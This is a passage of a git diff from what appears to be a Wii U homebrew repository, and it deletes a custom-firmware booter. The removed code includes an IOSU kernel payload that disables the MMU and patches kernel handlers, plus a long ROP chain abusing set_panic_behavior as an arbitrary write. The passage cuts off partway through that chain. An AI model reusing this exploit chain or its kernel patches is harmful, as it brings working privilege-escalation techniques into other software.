0x144 bytes long, so 0x10149A6C - (0x144*0xB349B) = 0x1E60640, - //! which is the physical address of 0xF5E60640 for us, right at the end of MEM1 - int request_buffer[] = { -(0xB349B), val }; - int output_buffer[32]; - return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer)); -} diff --git a/dsrom/CBHC/pad.h b/dsrom/cbhc_menu/pad.h similarity index 100% rename from dsrom/CBHC/pad.h rename to dsrom/cbhc_menu/pad.h diff --git a/dsrom/CBHC/types.h b/dsrom/cbhc_menu/types.h similarity index 100% rename from dsrom/CBHC/types.h rename to dsrom/cbhc_menu/types.h diff --git a/dsrom/cfw_booter/Makefile b/dsrom/cfw_booter/Makefile deleted file mode 100644 index 729caca..0000000 --- a/dsrom/cfw_booter/Makefile +++ /dev/null @@ -1,44 +0,0 @@ -PATH := $(DEVKITPPC)/bin:$(PATH) -PREFIX ?= powerpc-eabi- -CC = $(PREFIX)gcc -AS = $(PREFIX)gcc -CFLAGS = -std=gnu99 -O3 -nostdinc -fno-builtin -ASFLAGS = -mregnames -x assembler-with-cpp -LD = $(PREFIX)ld -OBJCOPY = $(PREFIX)objcopy -LDFLAGS=-Ttext 180C000 -L$(DEVKITPPC)/lib/gcc/powerpc-eabi/6.2.0 -lgcc -OBJDUMP ?= $(PREFIX)objdump -project := . -root := $(CURDIR) -build := $(root)/bin - -FIRMWARE = 550 - -all: clean setup main - -$(CURDIR)/payload/arm_kernel_bin.h: $(CURDIR)/payload/arm_user_bin.h - @$(MAKE) --no-print-directory -C $(CURDIR)/arm_kernel -f $(CURDIR)/arm_kernel/Makefile - @-mkdir -p $(CURDIR)/payload - @cp -p $(CURDIR)/arm_kernel/arm_kernel_bin.h $@ - -$(CURDIR)/payload/arm_user_bin.h: - @$(MAKE) --no-print-directory -C $(CURDIR)/arm_user -f $(CURDIR)/arm_user/Makefile - @-mkdir -p $(CURDIR)/payload - @cp -p $(CURDIR)/arm_user/arm_user_bin.h $@ - -setup: - mkdir -p $(root)/bin/ - -main: $(CURDIR)/payload/arm_kernel_bin.h - $(CC) $(CFLAGS) -DVER=$(FIRMWARE) -c $(project)/main.c - $(AS) $(ASFLAGS) -DVER=$(FIRMWARE) -c $(project)/crt0.S - cp -r $(root)/*.o $(build) - rm $(root)/*.o - $(LD) -o cfw_booter.elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map cfw_booter.map - $(OBJCOPY) cfw_booter.elf -S -O binary ../cfw_booter.bin - -clean: - rm -rf $(build) payload - rm -rf cfw_booter.elf cfw_booter.map - $(MAKE) --no-print-directory -C $(CURDIR)/arm_user -f $(CURDIR)/arm_user/Makefile clean - $(MAKE) --no-print-directory -C $(CURDIR)/arm_kernel -f $(CURDIR)/arm_kernel/Makefile clean diff --git a/dsrom/cfw_booter/README b/dsrom/cfw_booter/README deleted file mode 100644 index 2dbcc78..0000000 --- a/dsrom/cfw_booter/README +++ /dev/null @@ -1,2 +0,0 @@ -This is a modified version of cfw booter which can be found here: -https://github.com/dimok789/cfw_booter \ No newline at end of file diff --git a/dsrom/cfw_booter/arm_kernel/Makefile b/dsrom/cfw_booter/arm_kernel/Makefile deleted file mode 100644 index 54df575..0000000 --- a/dsrom/cfw_booter/arm_kernel/Makefile +++ /dev/null @@ -1,71 +0,0 @@ -ifeq ($(strip $(DEVKITARM)),) -$(error "Please set DEVKITARM in your environment. export DEVKITARM=devkitARM") -endif - -ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),) -export PATH:=$(DEVKITARM)/bin:$(PATH) -endif - -CC = arm-none-eabi-gcc -# LINK = arm-none-eabi-gcc -LINK = arm-none-eabi-ld -AS = arm-none-eabi-as -OBJCOPY = arm-none-eabi-objcopy -CFLAGS += -Wall -mbig-endian -std=gnu99 -march=armv5 -Os -I$(DEVKITPRO)/libnds/include -LDFLAGS += --script=link.ld -EB -L"$(DEVKITARM)/arm-none-eabi/lib" -Map=output.map - -CFILES = $(wildcard source/*.c) -BINFILES = $(wildcard data/*.bin) -OFILES = $(BINFILES:data/%.bin=build/%.bin.o) -OFILES += $(CFILES:source/%.c=build/%.o) -DFILES = $(CFILES:source/%.c=build/%.d) -SFILES = $(wildcard source/*.s) -OFILES += $(SFILES:source/%.s=build/%.o) -PROJECTNAME = ${shell basename "$(CURDIR)"} -CWD = "$(CURDIR)"" - -#--------------------------------------------------------------------------------- -# canned command sequence for binary data, taken from devkitARM -#--------------------------------------------------------------------------------- -define bin2o - bin2s $< | $(AS) -o $(@) - echo "extern const u8" `(echo $( source/`(echo $(> source/`(echo $(> source/`(echo $( $@ - -$(PROJECTNAME).elf: $(OFILES) - $(LINK) $(LDFLAGS) -o $(PROJECTNAME).elf $(filter-out build/crt0.o, $(OFILES)) - -clean: - @rm -rf build - @rm -f $(PROJECTNAME).elf $(PROJECTNAME).bin $(PROJECTNAME)_bin.h output.map - @echo "all cleaned up !" - --include $(DFILES) - -build/%.o: source/%.c - $(CC) $(CFLAGS) -c $< -o $@ - @$(CC) -MM $< > build/$*.d - -build/%.o: source/%.s - $(CC) $(CFLAGS) -xassembler-with-cpp -c $< -o $@ - @$(CC) -MM $< > build/$*.d - -build/%.bin.o: data/%.bin - @echo $(notdir $<) - @$(bin2o) diff --git a/dsrom/cfw_booter/arm_kernel/link.ld b/dsrom/cfw_booter/arm_kernel/link.ld deleted file mode 100644 index c28ba4a..0000000 --- a/dsrom/cfw_booter/arm_kernel/link.ld +++ /dev/null @@ -1,18 +0,0 @@ -OUTPUT_ARCH(arm) - -MEMORY -{ - RAMX (rx) : ORIGIN = 0x08134100, LENGTH = 0x000BF00 -} - -SECTIONS -{ - .text : ALIGN(0x100) { - build/crt0.o(.init) - *(.text) - } - .rodata : { - *(.rodata*) - } -} - diff --git a/dsrom/cfw_booter/arm_kernel/source/crt0.s b/dsrom/cfw_booter/arm_kernel/source/crt0.s deleted file mode 100644 index ae2a3b1..0000000 --- a/dsrom/cfw_booter/arm_kernel/source/crt0.s +++ /dev/null @@ -1,12 +0,0 @@ -.section ".init" -.arm -.align 4 - -.extern _main -.type _main, %function - -.extern memset -.type memset, %function - -_start: - b _main diff --git a/dsrom/cfw_booter/arm_kernel/source/main.c b/dsrom/cfw_booter/arm_kernel/source/main.c deleted file mode 100644 index cfd7b4e..0000000 --- a/dsrom/cfw_booter/arm_kernel/source/main.c +++ /dev/null @@ -1,122 +0,0 @@ -#include "types.h" -#include "utils.h" -#include "../../payload/arm_user_bin.h" - -static const char repairData_set_fault_behavior[] = { - 0xE1,0x2F,0xFF,0x1E,0xE9,0x2D,0x40,0x30,0xE5,0x93,0x20,0x00,0xE1,0xA0,0x40,0x00, - 0xE5,0x92,0x30,0x54,0xE1,0xA0,0x50,0x01,0xE3,0x53,0x00,0x01,0x0A,0x00,0x00,0x02, - 0xE1,0x53,0x00,0x00,0xE3,0xE0,0x00,0x00,0x18,0xBD,0x80,0x30,0xE3,0x54,0x00,0x0D, -}; -static const char repairData_set_panic_behavior[] = { - 0x08,0x16,0x6C,0x00,0x00,0x00,0x18,0x0C,0x08,0x14,0x40,0x00,0x00,0x00,0x9D,0x70, - 0x08,0x16,0x84,0x0C,0x00,0x00,0xB4,0x0C,0x00,0x00,0x01,0x01,0x08,0x14,0x40,0x00, - 0x08,0x15,0x00,0x00,0x08,0x17,0x21,0x80,0x08,0x17,0x38,0x00,0x08,0x14,0x30,0xD4, - 0x08,0x14,0x12,0x50,0x08,0x14,0x12,0x94,0xE3,0xA0,0x35,0x36,0xE5,0x93,0x21,0x94, - 0xE3,0xC2,0x2E,0x21,0xE5,0x83,0x21,0x94,0xE5,0x93,0x11,0x94,0xE1,0x2F,0xFF,0x1E, - 0xE5,0x9F,0x30,0x1C,0xE5,0x9F,0xC0,0x1C,0xE5,0x93,0x20,0x00,0xE1,0xA0,0x10,0x00, - 0xE5,0x92,0x30,0x54,0xE5,0x9C,0x00,0x00, -}; -static const char repairData_usb_root_thread[] = { - 0xE5,0x8D,0xE0,0x04,0xE5,0x8D,0xC0,0x08,0xE5,0x8D,0x40,0x0C,0xE5,0x8D,0x60,0x10, - 0xEB,0x00,0xB2,0xFD,0xEA,0xFF,0xFF,0xC9,0x10,0x14,0x03,0xF8,0x10,0x62,0x4D,0xD3, - 0x10,0x14,0x50,0x00,0x10,0x14,0x50,0x20,0x10,0x14,0x00,0x00,0x10,0x14,0x00,0x90, - 0x10,0x14,0x00,0x70,0x10,0x14,0x00,0x98,0x10,0x14,0x00,0x84,0x10,0x14,0x03,0xE8, - 0x10,0x14,0x00,0x3C,0x00,0x00,0x01,0x73,0x00,0x00,0x01,0x76,0xE9,0x2D,0x4F,0xF0, - 0xE2,0x4D,0xDE,0x17,0xEB,0x00,0xB9,0x92,0xE3,0xA0,0x10,0x00,0xE3,0xA0,0x20,0x03, - 0xE5,0x9F,0x0E,0x68,0xEB,0x00,0xB3,0x20, -}; - -/* from smealum's iosuhax: must be placed at 0x05059938 */ -static const char os_launch_hook[] = { - 0x47, 0x78, 0x00, 0x00, 0xe9, 0x2d, 0x40, 0x0f, 0xe2, 0x4d, 0xd0, 0x08, 0xeb, - 0xff, 0xfd, 0xfd, 0xe3, 0xa0, 0x00, 0x00, 0xeb, 0xff, 0xfe, 0x03, 0xe5, 0x9f, - 0x10, 0x4c, 0xe5, 0x9f, 0x20, 0x4c, 0xe3, 0xa0, 0x30, 0x00, 0xe5, 0x8d, 0x30, - 0x00, 0xe5, 0x8d, 0x30, 0x04, 0xeb, 0xff, 0xfe, 0xf1, 0xe2, 0x8d, 0xd0, 0x08, - 0xe8, 0xbd, 0x80, 0x0f, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x73, 0x64, 0x63, 0x61, - 0x72, 0x64, 0x30, 0x31, 0x00, 0x2f, 0x76, 0x6f, 0x6c, 0x2f, 0x73, 0x64, 0x63, - 0x61, 0x72, 0x64, 0x00, 0x00, 0x00, 0x2f, 0x76, 0x6f, 0x6c, 0x2f, 0x73, 0x64, - 0x63, 0x61, 0x72, 0x64, 0x00, 0x05, 0x11, 0x60, 0x00, 0x05, 0x0b, 0xe0, 0x00, - 0x05, 0x0b, 0xcf, 0xfc, 0x05, 0x05, 0x99, 0x70, 0x05, 0x05, 0x99, 0x7e, -}; - -static unsigned int __attribute__((noinline)) disable_mmu(void) -{ - unsigned int control_register = 0; - asm volatile("MRC p15, 0, %0, c1, c0, 0" : "=r" (control_register)); - asm volatile("MCR p15, 0, %0, c1, c0, 0" : : "r" (control_register & 0xFFFFEFFA)); - return control_register; -} - -static void __attribute__((noinline)) restore_mmu(unsigned int control_register) -{ - asm volatile("MCR p15, 0, %0, c1, c0, 0" : : "r" (control_register)); -} - -int _main() -{ - int(*disable_interrupts)() = (int(*)())0x0812E778; - int(*enable_interrupts)(int) = (int(*)(int))0x0812E78C; - void(*invalidate_icache)() = (void(*)())0x0812DCF0; - void(*invalidate_dcache)(unsigned int, unsigned int) = (void(*)())0x08120164; - void(*flush_dcache)(unsigned int, unsigned int) = (void(*)())0x08120160; - char* (*kernel_memcpy)(void*, void*, int) = (char*(*)(void*, void*, int))0x08131D04; - - flush_dcache(0x081200F0, 0x4001); // giving a size >= 0x4000 flushes all cache - - int level = disable_interrupts(); - - unsigned int control_register = disable_mmu(); - - /* Save the request handle so we can reply later */ - *(volatile u32*)0x01E10000 = *(volatile u32*)0x1016AD18; - - /* Patch kernel_error_handler to BX LR immediately */ - *(int*)0x08129A24 = 0xE12FFF1E; - - void * pset_fault_behavior = (void*)0x081298BC; - kernel_memcpy(pset_fault_behavior, (void*)repairData_set_fault_behavior, sizeof(repairData_set_fault_behavior)); - - void * pset_panic_behavior = (void*)0x081296E4; - kernel_memcpy(pset_panic_behavior, (void*)repairData_set_panic_behavior, sizeof(repairData_set_panic_behavior)); - - void * pusb_root_thread = (void*)0x10100174; - kernel_memcpy(pusb_root_thread, (void*)repairData_usb_root_thread, sizeof(repairData_usb_root_thread)); - - void * pUserBinSource = (void*)0x01E50000; - void * pUserBinDest = (void*)0x101312D0; - kernel_memcpy(pUserBinDest, (void*)pUserBinSource, sizeof(arm_user_bin)); - - int i; - for (i = 0; i < 32; i++) - if (i < 31) - ((char*)(0x050663B4 - 0x05000000 + 0x081C0000))[i] = ((char*)0x01E70000)[i]; - else - ((char*)(0x050663B4 - 0x05000000 + 0x081C0000))[i] = (char)0; - - *(int*)(0x050282AE - 0x05000000 + 0x081C0000) = 0xF031FB43; // bl launch_os_hook - - *(int*)(0x05052C44 - 0x05000000 + 0x081C0000) = 0xE3A00000; // mov r0, #0 - *(int*)(0x05052C48 - 0x05000000 + 0x081C0000) = 0xE12FFF1E; // bx lr - - *(int*)(0x0500A818 - 0x05000000 + 0x081C0000) = 0x20002000; // mov r0, #0; mov r0, #0 - - *(int*)(0x040017E0 - 0x04000000 + 0x08280000) = 0xE3A00000; - *(int*)(0x040019C4 - 0x04000000 + 0x08280000) = 0xE3A00000; - *(int*)(0x04001BB0 - 0x04000000 + 0x08280000) = 0xE3A00000; - *(int*)(0x04001D40 - 0x04000000 + 0x08280000) = 0xE3A00000; - - for (i = 0; i < sizeof(os_launch_hook); i++) - ((char*)(0x05059938 - 0x05000000 + 0x081C0000))[i] = os_launch_hook[i]; - - *(int*)(0x1555500) = 0; - - /* REENABLE MMU */ - restore_mmu(control_register); - - invalidate_dcache(0x081298BC, 0x4001); // giving a size >= 0x4000 invalidates all cache - invalidate_icache(); - - enable_interrupts(level); - - return 0; -} diff --git a/dsrom/cfw_booter/arm_kernel/source/types.h b/dsrom/cfw_booter/arm_kernel/source/types.h deleted file mode 100644 index 5d8eced..0000000 --- a/dsrom/cfw_booter/arm_kernel/source/types.h +++ /dev/null @@ -1,16 +0,0 @@ -#ifndef _TYPES_H -#define _TYPES_H - -#include - -typedef uint8_t u8; -typedef uint16_t u16; -typedef uint32_t u32; -typedef uint64_t u64; - -typedef int8_t s8; -typedef int16_t s16; -typedef int32_t s32; -typedef int64_t s64; - -#endif diff --git a/dsrom/cfw_booter/arm_kernel/source/utils.c b/dsrom/cfw_booter/arm_kernel/source/utils.c deleted file mode 100644 index f02ae47..0000000 --- a/dsrom/cfw_booter/arm_kernel/source/utils.c +++ /dev/null @@ -1,25 +0,0 @@ - -void* m_memcpy(void *dst, const void *src, unsigned int len) -{ - const unsigned char *src_ptr = (const unsigned char *)src; - unsigned char *dst_ptr = (unsigned char *)dst; - - while(len) - { - *dst_ptr++ = *src_ptr++; - --len; - } - return dst; -} - -void* m_memset(void *dst, int val, unsigned int bytes) -{ - unsigned char *dst_ptr = (unsigned char *)dst; - unsigned int i = 0; - while(i < bytes) - { - dst_ptr[i] = val; - ++i; - } - return dst; -} diff --git a/dsrom/cfw_booter/arm_kernel/source/utils.h b/dsrom/cfw_booter/arm_kernel/source/utils.h deleted file mode 100644 index fd41db2..0000000 --- a/dsrom/cfw_booter/arm_kernel/source/utils.h +++ /dev/null @@ -1,7 +0,0 @@ -#ifndef _UTILS_H_ -#define _UTILS_H_ - -void* m_memcpy(void *dst, const void *src, unsigned int len); -void* m_memset(void *dst, int val, unsigned int len); - -#endif diff --git a/dsrom/cfw_booter/arm_user/Makefile b/dsrom/cfw_booter/arm_user/Makefile deleted file mode 100644 index 54df575..0000000 --- a/dsrom/cfw_booter/arm_user/Makefile +++ /dev/null @@ -1,71 +0,0 @@ -ifeq ($(strip $(DEVKITARM)),) -$(error "Please set DEVKITARM in your environment. export DEVKITARM=devkitARM") -endif - -ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),) -export PATH:=$(DEVKITARM)/bin:$(PATH) -endif - -CC = arm-none-eabi-gcc -# LINK = arm-none-eabi-gcc -LINK = arm-none-eabi-ld -AS = arm-none-eabi-as -OBJCOPY = arm-none-eabi-objcopy -CFLAGS += -Wall -mbig-endian -std=gnu99 -march=armv5 -Os -I$(DEVKITPRO)/libnds/include -LDFLAGS += --script=link.ld -EB -L"$(DEVKITARM)/arm-none-eabi/lib" -Map=output.map - -CFILES = $(wildcard source/*.c) -BINFILES = $(wildcard data/*.bin) -OFILES = $(BINFILES:data/%.bin=build/%.bin.o) -OFILES += $(CFILES:source/%.c=build/%.o) -DFILES = $(CFILES:source/%.c=build/%.d) -SFILES = $(wildcard source/*.s) -OFILES += $(SFILES:source/%.s=build/%.o) -PROJECTNAME = ${shell basename "$(CURDIR)"} -CWD = "$(CURDIR)"" - -#--------------------------------------------------------------------------------- -# canned command sequence for binary data, taken from devkitARM -#--------------------------------------------------------------------------------- -define bin2o - bin2s $< | $(AS) -o $(@) - echo "extern const u8" `(echo $( source/`(echo $(> source/`(echo $(> source/`(echo $( $@ - -$(PROJECTNAME).elf: $(OFILES) - $(LINK) $(LDFLAGS) -o $(PROJECTNAME).elf $(filter-out build/crt0.o, $(OFILES)) - -clean: - @rm -rf build - @rm -f $(PROJECTNAME).elf $(PROJECTNAME).bin $(PROJECTNAME)_bin.h output.map - @echo "all cleaned up !" - --include $(DFILES) - -build/%.o: source/%.c - $(CC) $(CFLAGS) -c $< -o $@ - @$(CC) -MM $< > build/$*.d - -build/%.o: source/%.s - $(CC) $(CFLAGS) -xassembler-with-cpp -c $< -o $@ - @$(CC) -MM $< > build/$*.d - -build/%.bin.o: data/%.bin - @echo $(notdir $<) - @$(bin2o) diff --git a/dsrom/cfw_booter/arm_user/link.ld b/dsrom/cfw_booter/arm_user/link.ld deleted file mode 100644 index 5408355..0000000 --- a/dsrom/cfw_booter/arm_user/link.ld +++ /dev/null @@ -1,18 +0,0 @@ -OUTPUT_ARCH(arm) - -MEMORY -{ - RAMX (rx) : ORIGIN = 0x101312D0, LENGTH = 0x000BF00 -} - -SECTIONS -{ - .text : ALIGN(0x04) { - build/crt0.o(.init) - *(.text) - } - .rodata : { - *(.rodata*) - } -} - diff --git a/dsrom/cfw_booter/arm_user/source/crt0.s b/dsrom/cfw_booter/arm_user/source/crt0.s deleted file mode 100644 index b5608cd..0000000 --- a/dsrom/cfw_booter/arm_user/source/crt0.s +++ /dev/null @@ -1,20 +0,0 @@ -.section ".init" -.arm -.align 4 - -.extern _main -.type _main, %function - -.extern memset -.type memset, %function - -_start: - b _main - - .global IOS_DCFlushAllCache -IOS_DCFlushAllCache: - MOV R15, R0 -clean_loop: - MRC p15, 0, r15, c7, c10, 3 - BNE clean_loop - MCR p15, 0, R0, c7, c10, 4 diff --git a/dsrom/cfw_booter/arm_user/source/main.c b/dsrom/cfw_booter/arm_user/source/main.c deleted file mode 100644 index 6f90ca5..0000000 --- a/dsrom/cfw_booter/arm_user/source/main.c +++ /dev/null @@ -1,30 +0,0 @@ -#include "types.h" -#include "utils.h" - - -void _main() -{ - - void(*ios_shutdown)(int) = (void(*)(int))0x1012EE4C; - - int(*reply)(int, int) = (int(*)(int, int))0x1012ED04; - - int saved_handle = *(volatile u32*)0x01E10000; - int myret = reply(saved_handle, 0); - if (myret != 0) - ios_shutdown(1); - - // stack pointer will be 0x1016AE30 - // link register will be 0x1012EACC - asm("LDR SP, newsp\n" - "LDR R0, newr0\n" - "LDR LR, newlr\n" - "LDR PC, newpc\n" - "newsp: .word 0x1016AE30\n" - "newlr: .word 0x1012EACC\n" - "newr0: .word 0x10146080\n" - "newpc: .word 0x10111164\n"); - - - -} diff --git a/dsrom/cfw_booter/arm_user/source/types.h b/dsrom/cfw_booter/arm_user/source/types.h deleted file mode 100644 index 5d8eced..0000000 --- a/dsrom/cfw_booter/arm_user/source/types.h +++ /dev/null @@ -1,16 +0,0 @@ -#ifndef _TYPES_H -#define _TYPES_H - -#include - -typedef uint8_t u8; -typedef uint16_t u16; -typedef uint32_t u32; -typedef uint64_t u64; - -typedef int8_t s8; -typedef int16_t s16; -typedef int32_t s32; -typedef int64_t s64; - -#endif diff --git a/dsrom/cfw_booter/arm_user/source/utils.c b/dsrom/cfw_booter/arm_user/source/utils.c deleted file mode 100644 index f02ae47..0000000 --- a/dsrom/cfw_booter/arm_user/source/utils.c +++ /dev/null @@ -1,25 +0,0 @@ - -void* m_memcpy(void *dst, const void *src, unsigned int len) -{ - const unsigned char *src_ptr = (const unsigned char *)src; - unsigned char *dst_ptr = (unsigned char *)dst; - - while(len) - { - *dst_ptr++ = *src_ptr++; - --len; - } - return dst; -} - -void* m_memset(void *dst, int val, unsigned int bytes) -{ - unsigned char *dst_ptr = (unsigned char *)dst; - unsigned int i = 0; - while(i < bytes) - { - dst_ptr[i] = val; - ++i; - } - return dst; -} diff --git a/dsrom/cfw_booter/arm_user/source/utils.h b/dsrom/cfw_booter/arm_user/source/utils.h deleted file mode 100644 index fd41db2..0000000 --- a/dsrom/cfw_booter/arm_user/source/utils.h +++ /dev/null @@ -1,7 +0,0 @@ -#ifndef _UTILS_H_ -#define _UTILS_H_ - -void* m_memcpy(void *dst, const void *src, unsigned int len); -void* m_memset(void *dst, int val, unsigned int len); - -#endif diff --git a/dsrom/cfw_booter/crt0.S b/dsrom/cfw_booter/crt0.S deleted file mode 100644 index d2095cf..0000000 --- a/dsrom/cfw_booter/crt0.S +++ /dev/null @@ -1,7 +0,0 @@ - - .extern __main - .globl _start - -_start: - # jump to our main - b __main diff --git a/dsrom/cfw_booter/main.c b/dsrom/cfw_booter/main.c deleted file mode 100644 index d64a869..0000000 --- a/dsrom/cfw_booter/main.c +++ /dev/null @@ -1,387 +0,0 @@ -#include "types.h" -#include "coreinit.h" - -#define CHAIN_START 0x1016AD40 -#define SHUTDOWN 0x1012EE4C -#define SIMPLE_RETURN 0x101014E4 -#define SOURCE 0x01E20000 -#define IOS_CREATETHREAD 0x1012EABC -#define ARM_CODE_BASE 0x08134100 -#define REPLACE_SYSCALL 0x081298BC - -/* YOUR ARM CODE HERE (starts at ARM_CODE_BASE) */ -#include "payload/arm_kernel_bin.h" -#include "payload/arm_user_bin.h" - -/* ROP CHAIN STARTS HERE (0x1015BD78) */ -static const int final_chain[] = { - 0x101236f3, // 0x00 POP {R1-R7,PC} - 0x0, // 0x04 arg - 0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR - 0x68, // 0x0C stacksize - 0x10101638, // 0x10 - 0x0, // 0x14 - 0x0, // 0x18 - 0x0, // 0x1C - 0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} - 0x0, // 0x24 - 0x0, // 0x28 - 0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x30 - 0x0, // 0x34 - IOS_CREATETHREAD, // 0x38 - 0x1, // 0x3C - 0x2, // 0x40 - 0x10123a9f, // 0x44 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x00, // 0x48 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE92D4010, // 0x4C value: PUSH {R4,LR} - 0x0, // 0x50 - 0x10123a8b, // 0x54 POP {R3,R4,PC} - 0x1, // 0x58 R3 must be 1 for the arbitrary write - 0x0, // 0x5C - 0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x64 - 0x0, // 0x68 - 0x1012EE64, // 0x6C set_panic_behavior (arbitrary write) - 0x0, // 0x70 - 0x0, // 0x74 - 0x10123a9f, // 0x78 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x04, // 0x7C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A04000, // 0x80 value: MOV R4, R0 - 0x0, // 0x84 - 0x10123a8b, // 0x88 POP {R3,R4,PC} - 0x1, // 0x8C R3 must be 1 for the arbitrary write - 0x0, // 0x90 - 0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x98 - 0x0, // 0x9C - 0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write) - 0x0, // 0xA4 - 0x0, // 0xA8 - 0x10123a9f, // 0xAC POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x08, // 0xB0 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF - 0x0, // 0xB8 - 0x10123a8b, // 0xBC POP {R3,R4,PC} - 0x1, // 0xC0 R3 must be 1 for the arbitrary write - 0x0, // 0xC4 - 0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0xCC - 0x0, // 0xD0 - 0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write) - 0x0, // 0xD8 - 0x0, // 0xDC - 0x10123a9f, // 0xE0 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x0C, // 0xE4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0) - 0x0, // 0xEC - 0x10123a8b, // 0xF0 POP {R3,R4,PC} - 0x1, // 0xF4 R3 must be 1 for the arbitrary write - 0x0, // 0xF8 - 0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x100 - 0x0, // 0x104 - 0x1012EE64, // 0x108 set_panic_behavior (arbitrary write) - 0x0, // 0x10C - 0x0, // 0x110 - 0x10123a9f, // 0x114 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x10, // 0x118 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A00004, // 0x11C value: MOV R0, R4 - 0x0, // 0x120 - 0x10123a8b, // 0x124 POP {R3,R4,PC} - 0x1, // 0x128 R3 must be 1 for the arbitrary write - 0x0, // 0x12C - 0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x134 - 0x0, // 0x138 - 0x1012EE64, // 0x13C set_panic_behavior (arbitrary write) - 0x0, // 0x140 - 0x0, // 0x144 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x14, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x18, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0x00000000, // 0x150 value: NOP - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x1C, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3 - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x20, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0x1AFFFFFD, // 0x150 value: BNE clean_loop - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x24, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4 - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x28, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A03004, // 0x184 value: MOV R3, R4 - 0x0, // 0x188 - 0x10123a8b, // 0x18C POP {R3,R4,PC} - 0x1, // 0x190 R3 must be 1 for the arbitrary write - 0x0, // 0x194 - 